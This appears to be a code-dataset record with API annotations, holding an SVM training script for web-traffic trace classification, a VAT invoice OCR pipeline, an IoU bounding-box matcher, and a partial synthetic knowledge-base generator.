clf = GridSearchCV(estimator = SVC(kernel = 'rbf'), param_grid = param_grid, \
scoring = my_scorer, cv = 5, verbose = 0, n_jobs = -1)
clf.fit(train_X, train_Y)
# logger.info('Best estimator:%s'%clf.best_estimator_)
# logger.info('Best_score_:%s'%clf.best_score_)
return clf
if __name__ == '__main__':
global MON_SITE_NUM, tps, wps, fps, ps, ns, flag, OPEN_WORLD
tps, wps, fps, ps, ns = 0,0,0,0,0
flag = 0
args = parse_arguments()
# logger.info("Arguments: %s" % (args))
cf = read_conf(ct.confdir)
MON_SITE_NUM = int(cf['monitored_site_num'])
if cf['open_world'] == '1':
UNMON_SITE_NUM = int(cf['unmonitored_site_num'])
OPEN_WORLD = 1
else:
OPEN_WORLD = 0
# logger.info('loading data...')
dic = np.load(args.fp,allow_pickle=True).item()
X = np.array(dic['feature'])
y = np.array(dic['label'])
if not OPEN_WORLD:
X = X[y<MON_SITE_NUM]
y = y[y<MON_SITE_NUM]
# print(X.shape, y.shape)
#normalize the data
scaler = preprocessing.MinMaxScaler((-1,1))
X = scaler.fit_transform(X)
# logger.info('data are transformed into [-1,1]')
# find the optimal params
# logger.info('GridSearchCV...')
clf = GridSearch(X,y)
C = clf.best_params_['C']
gamma = clf.best_params_['gamma']
#C, gamma = 131072, 8.000000
# C, gamma = 8192, 8.00
# logger.info('Best params are: %d %f'%(C,gamma))
# sss = StratifiedShuffleSplit(n_splits=10, test_size=0.1, random_state=0)
# folder_num = 0
# flag = 1
# for train_index, test_index in sss.split(X,y):
# # logger.info('Testing fold %d'%folder_num)
# folder_num += 1
# # print("TRAIN:", train_index, "TEST:", test_index)
# X_train, X_test = X[train_index], X[test_index]
# y_train, y_test = y[train_index], y[test_index]
# model = SVC(C = C, gamma = gamma, kernel = 'rbf')
# model.fit(X_train, y_train)
# y_pred = model.predict(X_test)
# r_precision = score_func(y_test, y_pred)
# # logger.info('%d-presicion is %.4f'%(r, r_precision))
# print("%d %d %d %d %d"%(tps,wps,fps,ps,ns))
model = SVC(C = C, gamma = gamma, kernel = 'rbf')
model.fit(X, y)
joblib.dump(model, join(ct.modeldir,args.fp.split("/")[-1][:-4]+'.pkl'))
print('model have been saved')
|
[
"numpy.load",
"numpy.random.seed",
"argparse.ArgumentParser",
"logging.StreamHandler",
"sklearn.preprocessing.MinMaxScaler",
"logging.Formatter",
"sklearn.metrics.make_scorer",
"random.seed",
"numpy.array",
"sklearn.svm.SVC",
"configparser.ConfigParser",
"logging.getLogger"
] |
[((675, 701), 'logging.getLogger', 'logging.getLogger', (['"""cumul"""'], {}), "('cumul')\n", (692, 701), False, 'import logging\n'), ((702, 719), 'random.seed', 'random.seed', (['(1123)'], {}), '(1123)\n', (713, 719), False, 'import random\n'), ((720, 740), 'numpy.random.seed', 'np.random.seed', (['(1123)'], {}), '(1123)\n', (734, 740), True, 'import numpy as np\n'), ((1813, 1840), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (1838, 1840), False, 'import configparser\n'), ((1931, 2036), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""It simulates adaptive padding on a set of web traffic traces."""'}), "(description=\n 'It simulates adaptive padding on a set of web traffic traces.')\n", (1954, 2036), False, 'import argparse\n'), ((2893, 2924), 'logging.StreamHandler', 'logging.StreamHandler', (['log_file'], {}), '(log_file)\n', (2914, 2924), False, 'import logging\n'), ((4454, 4478), 'numpy.array', 'np.array', (["dic['feature']"], {}), "(dic['feature'])\n", (4462, 4478), True, 'import numpy as np\n'), ((4487, 4509), 'numpy.array', 'np.array', (["dic['label']"], {}), "(dic['label'])\n", (4495, 4509), True, 'import numpy as np\n'), ((4664, 4699), 'sklearn.preprocessing.MinMaxScaler', 'preprocessing.MinMaxScaler', (['(-1, 1)'], {}), '((-1, 1))\n', (4690, 4699), False, 'from sklearn import preprocessing\n'), ((5820, 5855), 'sklearn.svm.SVC', 'SVC', ([], {'C': 'C', 'gamma': 'gamma', 'kernel': '"""rbf"""'}), "(C=C, gamma=gamma, kernel='rbf')\n", (5823, 5855), False, 'from sklearn.svm import SVC\n'), ((2971, 3003), 'logging.Formatter', 'logging.Formatter', (['ct.LOG_FORMAT'], {}), '(ct.LOG_FORMAT)\n', (2988, 3003), False, 'import logging\n'), ((3365, 3412), 'sklearn.metrics.make_scorer', 'make_scorer', (['score_func'], {'greater_is_better': '(True)'}), '(score_func, greater_is_better=True)\n', (3376, 3412), False, 'from sklearn.metrics import make_scorer\n'), ((3641, 3658), 'sklearn.svm.SVC', 'SVC', ([], {'kernel': '"""rbf"""'}), "(kernel='rbf')\n", (3644, 3658), False, 'from sklearn.svm import SVC\n'), ((4401, 4436), 'numpy.load', 'np.load', (['args.fp'], {'allow_pickle': '(True)'}), '(args.fp, allow_pickle=True)\n', (4408, 4436), True, 'import numpy as np\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import cv2
import numpy as np
from cnocr import CnOcr
# 后续生成票据图像时的大小,按照标准增值税发票版式240mmX140mm来设定
height_resize = 1400
width_resize = 2400
# 实例化不同用途CnOcr对象
ocr = CnOcr(name='') # 混合字符
ocr_numbers = CnOcr(name='numbers', cand_alphabet='0123456789.') # 纯数字
ocr_UpperSerial = CnOcr(name='UpperSerial',
cand_alphabet='0123456789ABCDEFGHIJKLMNPQRSTUVWXYZ') # 编号,只包括大写字母(没有O)与数字
# 销售方字典
purchaser_dict = ['purchaserName', 'purchaserCode', 'purchaserAddrTel', 'purchaserBankCode']
seller_dict = ['sellerName', 'sellerCode', 'sellerAddrTel', 'sellerBankCode']
invoice_dict = ['invoiceCode', 'invoiceNumber', 'invoiceDate', 'checkCode']
# 截取图片中部分区域图像-字段
crop_range_list_name = ['invoice', 'purchaser', 'seller',
'totalExpense', 'totalTax', 'totalTaxExpenseZh', 'totalTaxExpense',
'remark', 'title', 'machineCode']
# 截取图片中部分区域图像-坐标
crop_range_list_data = [[1750, 20, 500, 250], [420, 280, 935, 220], [420, 1030, 935, 230],
[1500, 880, 390, 75], [2000, 880, 330, 75], [750, 960, 600, 65], [1870, 960, 300, 70],
[1455, 1045, 400, 180], [760, 50, 900, 110], [280, 200, 250, 75]]
# 截取图片中部分区域图像-使用ocr的类型,0:混合字符,1:纯数字,2:编号
crop_range_list_type = [3, 3, 3,
1, 1, 0, 1,
0, 0, 1]
# 调整原始图片尺寸
def resizeImg(image, height=height_resize):
h, w = image.shape[:2]
pro = height / h
size = (int(w * pro), int(height))
img = cv2.resize(image, size)
return img
# 边缘检测
def getCanny(image):
# 高斯模糊
binary = cv2.GaussianBlur(image, (3, 3), 2, 2)
# 边缘检测
binary = cv2.Canny(binary, 60, 240, apertureSize=3)
# 膨胀操作,尽量使边缘闭合
kernel = np.ones((3, 3), np.uint8)
binary = cv2.dilate(binary, kernel, iterations=1)
# 二值图
cv2.imwrite('result/binary.jpg', binary)
return binary
# 求出面积最大的轮廓
def findMaxContour(image):
# 寻找边缘
contours, _ = cv2.findContours(image, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
# 计算面积
max_area = 0.0
max_contour = []
for contour in contours:
current_area = cv2.contourArea(contour)
if current_area > max_area:
max_area = current_area
max_contour = contour
return max_contour, max_area
# 多边形拟合凸包的四个顶点
def getBoxPoint(contour):
# 多边形拟合凸包
hull = cv2.convexHull(contour)
epsilon = 0.02 * cv2.arcLength(contour, True)
approx = cv2.approxPolyDP(hull, epsilon, True)
approx = approx.reshape((len(approx), 2))
return approx
# 适配原四边形点集
def adapPoint(box, pro):
box_pro = box
if pro != 1.0:
box_pro = box / pro
box_pro = np.trunc(box_pro)
return box_pro
# 四边形顶点排序,[top-left, top-right, bottom-right, bottom-left]
def orderPoints(pts):
rect = np.zeros((4, 2), dtype="float32")
s = pts.sum(axis=1)
rect[0] = pts[np.argmin(s)]
rect[2] = pts[np.argmax(s)]
diff = np.diff(pts, axis=1)
rect[1] = pts[np.argmin(diff)]
rect[3] = pts[np.argmax(diff)]
return rect
# 计算长宽
def pointDistance(a, b):
return int(np.sqrt(np.sum(np.square(a - b))))
# 透视变换
def warpImage(image, box):
w, h = pointDistance(box[0], box[1]), \
pointDistance(box[1], box[2])
dst_rect = np.array([[0, 0],
[w - 1, 0],
[w - 1, h - 1],
[0, h - 1]], dtype='float32')
M = cv2.getPerspectiveTransform(box, dst_rect)
warped = cv2.warpPerspective(image, M, (w, h))
return warped
# 根据四点画四边形
def drawRect(img, pt1, pt2, pt3, pt4, color, line_width):
cv2.line(img, pt1, pt2, color, line_width)
cv2.line(img, pt2, pt3, color, line_width)
cv2.line(img, pt3, pt4, color, line_width)
cv2.line(img, pt1, pt4, color, line_width)
# 统合图片预处理
def imagePreProcessing(path):
image = cv2.imread(path)
# 转灰度、降噪
# image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
# image = cv2.GaussianBlur(image, (3,3), 0)
# 边缘检测、寻找轮廓、确定顶点
ratio = height_resize / image.shape[0]
img = resizeImg(image)
binary_img = getCanny(img)
max_contour, max_area = findMaxContour(binary_img)
box = getBoxPoint(max_contour)
boxes = adapPoint(box, ratio)
boxes = orderPoints(boxes)
# 透视变化
warped = warpImage(image, boxes)
# 调整最终图片大小
size = (width_resize, height_resize)
warped = cv2.resize(warped, size, interpolation=cv2.INTER_CUBIC)
# 画边缘框
drawRect(image, tuple(boxes[0]), tuple(boxes[1]), tuple(boxes[2]), tuple(boxes[3]), (0, 0, 255), 2)
cv2.imwrite("result/outline.jpg", image)
return warped
# 截取图片中部分区域图像,测试阶段使用,包括显示与保存图片,实际使用时不使用这个函数,使用下面的正式版函数
def cropImage_test(img, crop_range, filename='Undefined'):
xpos, ypos, width, height = crop_range
crop = img[ypos:ypos + height, xpos:xpos + width]
if filename == 'Undefined': # 如果未指定文件名,采用坐标来指定文件名
filename = 'crop-' + str(xpos) + '-' + str(ypos) + '-' + str(width) + '-' + str(height) + '.jpg'
cv2.imshow(filename, crop) # 展示截取区域图片---测试用
# cv2.imwrite(filename, crop) #imwrite在文件名含有中文时会有乱码,应该采用下方imencode---测试用
# 保存截取区域图片---测试用
cv2.imencode('.jpg', crop)[1].tofile(filename)
return crop
# 截取图片中部分区域图像
def cropImage(img, crop_range):
xpos, ypos, width, height = crop_range
crop = img[ypos:ypos + height, xpos:xpos + width]
return crop
# 从截取图片中识别文字
def cropOCR(crop, ocrType):
text_crop = ''
if ocrType == 0:
text_crop_list = ocr.ocr_for_single_line(crop)
elif ocrType == 1:
text_crop_list = ocr_numbers.ocr_for_single_line(crop)
elif ocrType == 2:
text_crop_list = ocr_UpperSerial.ocr_for_single_line(crop)
elif ocrType == 3:
text_crop_list = ocr.ocr(crop)
for i in range(len(text_crop_list)):
ocr_text = ''.join(text_crop_list[i]).split(':')[-1].split(';')[-1]
# 如果出现- — _ ― 一律算作边框
if '-' in ocr_text or '—' in ocr_text or '_' in ocr_text or '―' in ocr_text:
continue
text_crop = text_crop + ocr_text + ','
return text_crop
text_crop = ''.join(text_crop_list)
return text_crop
def imageOcr(path):
# 预处理图像
# path = 'test.jpg'
warped = imagePreProcessing(path)
# 分块识别
receipt = {}
for i in range(len(crop_range_list_data)):
crop = cropImage(warped, crop_range_list_data[i])
crop_text = cropOCR(crop, crop_range_list_type[i])
# 发票中不会有小写字母o l O,凡是出现o的都使用0替代,凡是出现l的都使用1替代,凡是出现O的都使用0替代,并去掉空格和冒号前面的字符
crop_text = crop_text.replace('o', '0').replace(' ', '').replace('l', '1').replace('O', '0').split(':')[-1]
# 销售方信息
if crop_range_list_name[i] == 'seller':
crop_text = crop_text.split(',')
for i in range(4):
if i < len(crop_text):
receipt.update({seller_dict[i]: crop_text[i]})
else:
receipt.update({seller_dict[i]: ''})
elif crop_range_list_name[i] == 'invoice':
crop_text = crop_text.split(',')
for i in range(4):
if i < len(crop_text):
receipt.update({invoice_dict[i]: crop_text[i]})
else:
receipt.update({invoice_dict[i]: ''})
elif crop_range_list_name[i] == 'purchaser':
crop_text = crop_text.split(',')
for i in range(4):
if i < len(crop_text):
receipt.update({purchaser_dict[i]: crop_text[i]})
else:
receipt.update({purchaser_dict[i]: ''})
else:
if crop_range_list_name[i] == 'title':
crop_text = crop_text[0:2] + '增值税普通发票'
receipt.update({crop_range_list_name[i]: crop_text})
receipt['sellerCode'] = receipt['sellerCode'].replace('工', '1').replace('.', '')
receipt['purchaserCode'] = receipt['purchaserCode'].replace('工', '1').replace('.', '')
for key in receipt:
print(key + ':' + receipt[key])
receipt.update({"serviceDetails": []})
cv2.imwrite('result/block.jpg', warped)
# 展示识别区域
for i in range(len(crop_range_list_data)):
warped = cv2.rectangle(warped, (crop_range_list_data[i][0], crop_range_list_data[i][1]),
(crop_range_list_data[i][0] + crop_range_list_data[i][2],
crop_range_list_data[i][1] + crop_range_list_data[i][3]),
(0, 0, 255), 2)
# 展示与保存预处理的图片---测试用,生产环境会报错
# cv2.namedWindow("warpImage", 0)
# cv2.resizeWindow("warpImage", 1200, 700)
# cv2.imshow('warpImage', warped)
# 保存图片到本地
cv2.imwrite('result/result.jpg', warped)
return receipt
if __name__ == '__main__':
print(imageOcr("test0.jpg"))
# cv2.waitKey(0)
|
[
"cv2.GaussianBlur",
"cv2.approxPolyDP",
"cv2.getPerspectiveTransform",
"cv2.arcLength",
"numpy.argmax",
"numpy.ones",
"numpy.argmin",
"cv2.rectangle",
"cv2.imencode",
"cv2.imshow",
"cv2.line",
"cv2.warpPerspective",
"cv2.contourArea",
"cv2.dilate",
"cv2.imwrite",
"cv2.resize",
"cnocr.CnOcr",
"cv2.Canny",
"numpy.square",
"cv2.convexHull",
"numpy.zeros",
"cv2.imread",
"numpy.diff",
"numpy.array",
"numpy.trunc",
"cv2.findContours"
] |
[((208, 222), 'cnocr.CnOcr', 'CnOcr', ([], {'name': '""""""'}), "(name='')\n", (213, 222), False, 'from cnocr import CnOcr\n'), ((245, 295), 'cnocr.CnOcr', 'CnOcr', ([], {'name': '"""numbers"""', 'cand_alphabet': '"""0123456789."""'}), "(name='numbers', cand_alphabet='0123456789.')\n", (250, 295), False, 'from cnocr import CnOcr\n'), ((321, 399), 'cnocr.CnOcr', 'CnOcr', ([], {'name': '"""UpperSerial"""', 'cand_alphabet': '"""0123456789ABCDEFGHIJKLMNPQRSTUVWXYZ"""'}), "(name='UpperSerial', cand_alphabet='0123456789ABCDEFGHIJKLMNPQRSTUVWXYZ')\n", (326, 399), False, 'from cnocr import CnOcr\n'), ((1536, 1559), 'cv2.resize', 'cv2.resize', (['image', 'size'], {}), '(image, size)\n', (1546, 1559), False, 'import cv2\n'), ((1629, 1666), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['image', '(3, 3)', '(2)', '(2)'], {}), '(image, (3, 3), 2, 2)\n', (1645, 1666), False, 'import cv2\n'), ((1691, 1733), 'cv2.Canny', 'cv2.Canny', (['binary', '(60)', '(240)'], {'apertureSize': '(3)'}), '(binary, 60, 240, apertureSize=3)\n', (1700, 1733), False, 'import cv2\n'), ((1766, 1791), 'numpy.ones', 'np.ones', (['(3, 3)', 'np.uint8'], {}), '((3, 3), np.uint8)\n', (1773, 1791), True, 'import numpy as np\n'), ((1805, 1845), 'cv2.dilate', 'cv2.dilate', (['binary', 'kernel'], {'iterations': '(1)'}), '(binary, kernel, iterations=1)\n', (1815, 1845), False, 'import cv2\n'), ((1861, 1901), 'cv2.imwrite', 'cv2.imwrite', (['"""result/binary.jpg"""', 'binary'], {}), "('result/binary.jpg', binary)\n", (1872, 1901), False, 'import cv2\n'), ((1990, 2055), 'cv2.findContours', 'cv2.findContours', (['image', 'cv2.RETR_EXTERNAL', 'cv2.CHAIN_APPROX_NONE'], {}), '(image, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n', (2006, 2055), False, 'import cv2\n'), ((2391, 2414), 'cv2.convexHull', 'cv2.convexHull', (['contour'], {}), '(contour)\n', (2405, 2414), False, 'import cv2\n'), ((2478, 2515), 'cv2.approxPolyDP', 'cv2.approxPolyDP', (['hull', 'epsilon', '(True)'], {}), '(hull, epsilon, True)\n', (2494, 2515), False, 'import cv2\n'), ((2697, 2714), 'numpy.trunc', 'np.trunc', (['box_pro'], {}), '(box_pro)\n', (2705, 2714), True, 'import numpy as np\n'), ((2828, 2861), 'numpy.zeros', 'np.zeros', (['(4, 2)'], {'dtype': '"""float32"""'}), "((4, 2), dtype='float32')\n", (2836, 2861), True, 'import numpy as np\n'), ((2961, 2981), 'numpy.diff', 'np.diff', (['pts'], {'axis': '(1)'}), '(pts, axis=1)\n', (2968, 2981), True, 'import numpy as np\n'), ((3288, 3363), 'numpy.array', 'np.array', (['[[0, 0], [w - 1, 0], [w - 1, h - 1], [0, h - 1]]'], {'dtype': '"""float32"""'}), "([[0, 0], [w - 1, 0], [w - 1, h - 1], [0, h - 1]], dtype='float32')\n", (3296, 3363), True, 'import numpy as np\n'), ((3447, 3489), 'cv2.getPerspectiveTransform', 'cv2.getPerspectiveTransform', (['box', 'dst_rect'], {}), '(box, dst_rect)\n', (3474, 3489), False, 'import cv2\n'), ((3503, 3540), 'cv2.warpPerspective', 'cv2.warpPerspective', (['image', 'M', '(w, h)'], {}), '(image, M, (w, h))\n', (3522, 3540), False, 'import cv2\n'), ((3634, 3676), 'cv2.line', 'cv2.line', (['img', 'pt1', 'pt2', 'color', 'line_width'], {}), '(img, pt1, pt2, color, line_width)\n', (3642, 3676), False, 'import cv2\n'), ((3681, 3723), 'cv2.line', 'cv2.line', (['img', 'pt2', 'pt3', 'color', 'line_width'], {}), '(img, pt2, pt3, color, line_width)\n', (3689, 3723), False, 'import cv2\n'), ((3728, 3770), 'cv2.line', 'cv2.line', (['img', 'pt3', 'pt4', 'color', 'line_width'], {}), '(img, pt3, pt4, color, line_width)\n', (3736, 3770), False, 'import cv2\n'), ((3775, 3817), 'cv2.line', 'cv2.line', (['img', 'pt1', 'pt4', 'color', 'line_width'], {}), '(img, pt1, pt4, color, line_width)\n', (3783, 3817), False, 'import cv2\n'), ((3872, 3888), 'cv2.imread', 'cv2.imread', (['path'], {}), '(path)\n', (3882, 3888), False, 'import cv2\n'), ((4399, 4454), 'cv2.resize', 'cv2.resize', (['warped', 'size'], {'interpolation': 'cv2.INTER_CUBIC'}), '(warped, size, interpolation=cv2.INTER_CUBIC)\n', (4409, 4454), False, 'import cv2\n'), ((4575, 4615), 'cv2.imwrite', 'cv2.imwrite', (['"""result/outline.jpg"""', 'image'], {}), "('result/outline.jpg', image)\n", (4586, 4615), False, 'import cv2\n'), ((5012, 5038), 'cv2.imshow', 'cv2.imshow', (['filename', 'crop'], {}), '(filename, crop)\n', (5022, 5038), False, 'import cv2\n'), ((8092, 8131), 'cv2.imwrite', 'cv2.imwrite', (['"""result/block.jpg"""', 'warped'], {}), "('result/block.jpg', warped)\n", (8103, 8131), False, 'import cv2\n'), ((8691, 8731), 'cv2.imwrite', 'cv2.imwrite', (['"""result/result.jpg"""', 'warped'], {}), "('result/result.jpg', warped)\n", (8702, 8731), False, 'import cv2\n'), ((2159, 2183), 'cv2.contourArea', 'cv2.contourArea', (['contour'], {}), '(contour)\n', (2174, 2183), False, 'import cv2\n'), ((2436, 2464), 'cv2.arcLength', 'cv2.arcLength', (['contour', '(True)'], {}), '(contour, True)\n', (2449, 2464), False, 'import cv2\n'), ((2904, 2916), 'numpy.argmin', 'np.argmin', (['s'], {}), '(s)\n', (2913, 2916), True, 'import numpy as np\n'), ((2936, 2948), 'numpy.argmax', 'np.argmax', (['s'], {}), '(s)\n', (2945, 2948), True, 'import numpy as np\n'), ((3000, 3015), 'numpy.argmin', 'np.argmin', (['diff'], {}), '(diff)\n', (3009, 3015), True, 'import numpy as np\n'), ((3035, 3050), 'numpy.argmax', 'np.argmax', (['diff'], {}), '(diff)\n', (3044, 3050), True, 'import numpy as np\n'), ((8210, 8431), 'cv2.rectangle', 'cv2.rectangle', (['warped', '(crop_range_list_data[i][0], crop_range_list_data[i][1])', '(crop_range_list_data[i][0] + crop_range_list_data[i][2], \n crop_range_list_data[i][1] + crop_range_list_data[i][3])', '(0, 0, 255)', '(2)'], {}), '(warped, (crop_range_list_data[i][0], crop_range_list_data[i][\n 1]), (crop_range_list_data[i][0] + crop_range_list_data[i][2], \n crop_range_list_data[i][1] + crop_range_list_data[i][3]), (0, 0, 255), 2)\n', (8223, 8431), False, 'import cv2\n'), ((3132, 3148), 'numpy.square', 'np.square', (['(a - b)'], {}), '(a - b)\n', (3141, 3148), True, 'import numpy as np\n'), ((5159, 5185), 'cv2.imencode', 'cv2.imencode', (['""".jpg"""', 'crop'], {}), "('.jpg', crop)\n", (5171, 5185), False, 'import cv2\n')]
|
import numpy as np
# create array data
predict = np.array([[1,2,2,1],
[4.5,2.5,10,0.5],
[6,6,8,4],
[6.26,6.26,8.26,4.26]],np.double)
truth = np.array([[1,4,3,3],
[1.2,2.2,2.2,1.2],
[5,2,8,1],
[6.1,6.1,8.1,4.1],
[8.1,8.1,11.1,9.1]], np.double)
# get useful variables
nums_pred = len(predict)
nums_gt = len(truth)
iou_matrix = np.zeros((nums_pred,nums_gt))
# boxA 存储的是边界框的左上顶点坐标和右下顶点坐标
# boxA=[x1,y1,x2,y2]
def iou(boxA, boxB):
# 计算重合部分的上下左右4个边的值,注意最大最小函数的使用
left_max = max(boxA[0],boxB[0])
top_max = max(boxA[1],boxB[1])
right_min = min(boxA[2], boxB[2])
bottom_min = min(boxA[3], boxB[3])
# 计算重合部分的面积
inter = max(0,(right_min-left_max)) * max(0, (bottom_min-top_max)) # 宽*高
Sa = (boxA[2]-boxA[0])*(boxA[3]-boxA[1])
Sb = (boxB[2]-boxB[0])*(boxB[3]-boxB[1])
# 计算所有区域的面积并计算 iou
union = Sa+Sb-inter
iou = inter/union
return iou
def transformBBox(boxA):
# 将 BBox 从左下 + 右上 表示转换为 左上 + 右下
return [boxA[0], boxA[3], boxA[2], boxA[1]]
# get iou matrix
for i in range(nums_pred):
for j in range(nums_gt):
#print(truth[j])
iou_matrix[i][j] = iou(transformBBox(predict[i]), transformBBox(truth[j]))
print(iou_matrix)
res = []
IOU_theta = 0.4
while np.any(iou_matrix > IOU_theta):
ind = np.argmax(iou_matrix)
ind_col = ind % nums_gt
ind_row = (ind - ind_col) // nums_gt
print("row = %d, col = %d"%(ind_row, ind_col))
# store results for more analysis
res.append([predict[ind_row], truth[ind_col]])
# set the correspoding row and col to zero
# exclude those already paired from future comparsion
iou_matrix[ind_row][:] = 0
# set col to 0
for ii in range(nums_pred):
iou_matrix[ii][ind_col] = 0
print(iou_matrix)
print(res)
|
[
"numpy.zeros",
"numpy.any",
"numpy.array",
"numpy.argmax"
] |
[((51, 152), 'numpy.array', 'np.array', (['[[1, 2, 2, 1], [4.5, 2.5, 10, 0.5], [6, 6, 8, 4], [6.26, 6.26, 8.26, 4.26]]', 'np.double'], {}), '([[1, 2, 2, 1], [4.5, 2.5, 10, 0.5], [6, 6, 8, 4], [6.26, 6.26, \n 8.26, 4.26]], np.double)\n', (59, 152), True, 'import numpy as np\n'), ((202, 322), 'numpy.array', 'np.array', (['[[1, 4, 3, 3], [1.2, 2.2, 2.2, 1.2], [5, 2, 8, 1], [6.1, 6.1, 8.1, 4.1], [\n 8.1, 8.1, 11.1, 9.1]]', 'np.double'], {}), '([[1, 4, 3, 3], [1.2, 2.2, 2.2, 1.2], [5, 2, 8, 1], [6.1, 6.1, 8.1,\n 4.1], [8.1, 8.1, 11.1, 9.1]], np.double)\n', (210, 322), True, 'import numpy as np\n'), ((452, 482), 'numpy.zeros', 'np.zeros', (['(nums_pred, nums_gt)'], {}), '((nums_pred, nums_gt))\n', (460, 482), True, 'import numpy as np\n'), ((1332, 1362), 'numpy.any', 'np.any', (['(iou_matrix > IOU_theta)'], {}), '(iou_matrix > IOU_theta)\n', (1338, 1362), True, 'import numpy as np\n'), ((1371, 1392), 'numpy.argmax', 'np.argmax', (['iou_matrix'], {}), '(iou_matrix)\n', (1380, 1392), True, 'import numpy as np\n')]
|
from kb import KB, TRAIN_LABEL, DEV_LABEL, TEST_LABEL
import random
import numpy as np
class SampleKB:
def __init__(self, num_relations, num_entities,
arities=[0.0, 1.0, 0.0],
fb_densities=[0.0, 0.0, 0.0],
arg_densities=[0., 0.1, 0.0],
fact_prob=0.2,
num_symm=2,
num_impl=[0, 2, 0],
num_impl_inv=2,
num_impl_conj=[0, 2, 0],
num_trans_single=2,
num_trans_diff=2,
seed=0,
position_dependent_args=False,
position_densities=[0., 0.5, 0.0]):
"""
:param num_relations:
:param num_entities: number of distinct entities to generate
:param arities: fraction of arities
:param arg_densities: fraction of entity combinations that are observed
:param fact_prob:
:param num_inv: number of 'inv' formulae R(X0, X1) :- R(X1, X0)
:param num_impl:
:param num_impl_conj:
:param num_trans:
:param negated_head_prob:
:param seed:
:return:
"""
random.seed(seed)
self.kb = KB(seed=seed)
num_relations_per_arity = [int(x * num_relations) for x in arities]
entities = list(map(lambda x: "e" + str(x), range(1, num_entities+1)))
entities_arg1 = []
entities_arg2 = []
entities_arg3 = []
if position_dependent_args:
arg1_boundary = int(len(entities)*position_densities[0])
arg2_boundary = arg1_boundary + int(len(entities)*position_densities[1])
entities_arg1 = entities[0:arg1_boundary]
entities_arg2 = entities[arg1_boundary:arg2_boundary]
entities_arg3 = entities[arg2_boundary:]
else:
entities_arg1 = entities
entities_arg2 = entities
entities_arg3 = entities
pairs = [(x, y) for x in entities_arg1
for y in entities_arg2 if not x == y]
triples = [(x, y, z) for x in entities_arg1
for y in entities_arg2 for z in entities_arg3
if not x == y and not y == z and not z == x]
num_pair_samples = min(len(pairs), int(len(entities_arg1) *
len(entities_arg2) *
arg_densities[1]))
num_triple_samples = min(len(triples), int(len(entities_arg1) *
len(entities_arg2) *
len(entities_arg3) *
arg_densities[2]))
entities_per_arity = {
1: entities_arg1,
2: random.sample(pairs, num_pair_samples),
3: random.sample(triples, num_triple_samples)
}
relations_per_arity = {}
for arity in range(1, len(num_relations_per_arity) + 1):
for i in range(1, num_relations_per_arity[arity - 1] + 1):
fb_prefix = ""
if fb_densities[arity-1] > random.uniform(0, 1.0):
fb_prefix = "REL$"
if arity == 1:
rel = fb_prefix+"u"
elif arity == 2:
rel = fb_prefix+"b"
else:
rel = fb_prefix+"t"
rel += str(i)
if not arity in relations_per_arity:
relations_per_arity[arity] = list()
relations_per_arity[arity].append(rel)
for args in random.sample(entities_per_arity[arity],
int(len(entities_per_arity[arity]) * fact_prob)):
self.kb.add_train(rel, args)
inverse = []
# sample symmetric relations r(X,Y) => r(Y,X)
if 2 in relations_per_arity:
symm = random.sample([(x, x) for x in relations_per_arity[2]], num_symm)
inverse += symm
# sampling implication, reversed: r1(X,Y) => r2(Y,X)
if 2 in relations_per_arity:
inverse += random.sample([(x, y) for x in relations_per_arity[2]
for y in relations_per_arity[2]
if not x == y], num_impl_inv)
if len(inverse) > 0:
self.kb.add_formulae("inv", {2: inverse})
# sampling implications:
# r1(X) => r2(X)
# r1(X,Y) => r2(X,Y)
implications_per_arity = {}
for arity in range(1, len(num_relations_per_arity) + 1):
if arity in relations_per_arity:
implications_per_arity[arity] = \
random.sample([(x, y) for x in relations_per_arity[arity] for y in relations_per_arity[arity]
if not x == y], num_impl[arity - 1])
self.kb.add_formulae("impl", implications_per_arity)
# sampling implications with conjunction in body:
# r1(X,Y) ^ r2(X,Y) => r3(X,Y)
# r1(X) ^ r2(X) => r3(X)
implications_with_conjunction_per_arity = {}
for arity in range(1, len(num_relations_per_arity) + 1):
if arity in relations_per_arity and len(relations_per_arity[arity]) >= 3:
implications_with_conjunction_per_arity[arity] = \
random.sample([(x, y, z) for x in relations_per_arity[arity]
for y in relations_per_arity[arity]
for z in relations_per_arity[arity]
if not x == y and not y == z and not z == x],
num_impl_conj[arity - 1])
self.kb.add_formulae("impl_conj", implications_with_conjunction_per_arity)
# sampling transitivities:
transitivities = []
# (1) simple transitivities r(X,Y) ^ r(Y,Z) => r(X,Z)
# (2) general transitivities r1(X,Y) ^ r2(Y,Z) => r3(X,Z) (r1, r2, r3 differ)
if 2 in relations_per_arity:
if num_trans_single > 0:
transitivities += random.sample([(x, x, x)
for x in relations_per_arity[2]], num_trans_single)
if num_trans_diff > 0:
transitivities += random.sample([(x, y, z)
for x in relations_per_arity[2]
for y in relations_per_arity[2]
for z in relations_per_arity[2]
if not x == y and
not y == z and
not z == x], num_trans_diff)
if len(transitivities) > 0:
self.kb.add_formulae("trans", {2: transitivities})
# todo: sampling negation (also applies to all heads of formulae above):
# r1 => !r2
def get_kb(self):
return self.kb
if __name__=="__main__":
import sys
import argparse
import os
#fixed args
sampled_unobserved_per_true = 1 # number of false (unobserved) test facts added for each true test fact (inferred from clause)
simple_transitivities = False
seed = 846
np.random.seed(seed)
#input args
argparser = argparse.ArgumentParser('create artificial dataset (train+test) with rules (all arity 2)')
argparser.add_argument('--entities', '-E', required=True, type=int, help='number of entities')
argparser.add_argument('--predicates', '-P', required=True, type=int, help='number of predicates')
argparser.add_argument('--test-prob', type=float, default=0.5,
help='fraction of inferred facts (from formulae) to be added to test set')
argparser.add_argument('--arg-density', type=float, default=0.1,
help='fraction of all possible pairs of entities observed')
argparser.add_argument('--fact-prob', type=float, default=0.1,
help='for all observed pairs: fraction of those that occur with each relation')
argparser.add_argument('--symm', type=int, default=0,
help='number of clauses p(X0, X1) :- p(X1, X0)')
argparser.add_argument('--impl', type=int, default=0,
help='number of clauses p(X0, X1) :- q(X0, X1) (with p and q different)')
argparser.add_argument('--impl-inv', type=int, default=0,
help='number of clauses p(X0, X1) :- q(X1, X0)')
argparser.add_argument('--impl-conj', type=int, default=0,
help='number of clauses r(X0, X1) :- p(X0, X1), q(X0, X1)')
